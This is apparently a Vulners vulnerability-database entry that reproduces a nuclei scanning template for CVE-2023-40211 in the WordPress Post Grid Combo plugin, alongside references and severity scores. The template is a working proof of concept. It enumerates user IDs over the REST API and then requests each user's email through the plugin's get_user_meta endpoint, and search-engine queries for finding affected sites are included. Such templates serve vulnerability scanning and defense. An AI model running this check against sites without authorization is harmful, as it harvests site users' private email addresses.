Lucene search
K

Post Grid <= 2.2.50 - Information Exposure via REST API

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

High severity information exposure in Post Grid Combo 36+ Gutenberg Blocks up to 2.2.50 via REST API.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-40211
4 Dec 202521:02
circl
CNNVD
WordPress Plugin Post Grid Combo Information Disclosure Vulnerability
30 Nov 202300:00
cnnvd
CVE
CVE-2023-40211
30 Nov 202315:03
cve
Cvelist
CVE-2023-40211 WordPress Post Grid Plugin <= 2.2.50 is vulnerable to Sensitive Data Exposure
30 Nov 202315:03
cvelist
EUVD
EUVD-2023-44808
3 Oct 202520:07
euvd
NVD
CVE-2023-40211
30 Nov 202315:15
nvd
Patchstack
WordPress Post Grid and Gutenberg Blocks Plugin <= 2.2.50 is vulnerable to Sensitive Data Exposure
11 Aug 202300:00
patchstack
Prion
Design/Logic Flaw
30 Nov 202315:15
prion
Positive Technologies
PT-2023-27329
30 Nov 202300:00
ptsecurity
RedhatCVE
CVE-2023-40211
23 May 202504:44
redhatcve
Rows per page
id: CVE-2023-40211

info:
  name: Post Grid <= 2.2.50 - Information Exposure via REST API
  author: daffainfo
  severity: high
  description: |
    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in PickPlugins Post Grid Combo – 36+ Gutenberg Blocks.This issue affects Post Grid Combo – 36+ Gutenberg Blocks: from n/a through 2.2.50.
  impact: |
    Unauthorized actors can access sensitive information, leading to privacy breaches and potential misuse of data.
  remediation: |
    Update to the latest version beyond 2.2.50 or apply available security patches.
  reference:
    - https://patchstack.com/database/vulnerability/post-grid/wordpress-post-grid-combo-plugin-2-2-50-sensitive-data-exposure-vulnerability?_s_id=cve
    - https://plugins.trac.wordpress.org/changeset/2947951/post-grid/trunk/src/functions-rest.php
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40211
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-40211
    epss-score: 0.02041
    epss-percentile: 0.7864
    cwe-id: CWE-200
    cpe: cpe:2.3:a:pickplugins:post_grid_combo:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: pickplugins
    product: post_grid_combo
    framework: wordpress
    fofa-query: body="/wp-content/plugins/post-grid-combo/"
    publicwww-query: "/wp-content/plugins/post-grid-combo/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,pickplugins,post-grid,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/users"
        - "?rest_route=/wp/v2/users"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "[{\"id", "name\":")'
        condition: and
        internal: true

    extractors:
      - type: json
        name: user_id
        internal: true
        json:
          - '.[0].id'

  - raw:
      - |
        POST /wp-json/post-grid/v2/get_user_meta HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{user_id}},"meta_key":"email"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"email":'

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210085be22d062414415751be4614a878218776b967206468f722c94f8b74e7e9b26022032142f8bdcdeb0bebbe20a839cb9d901b018c5697d6c331c191e19a3b8cc113a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.02041
16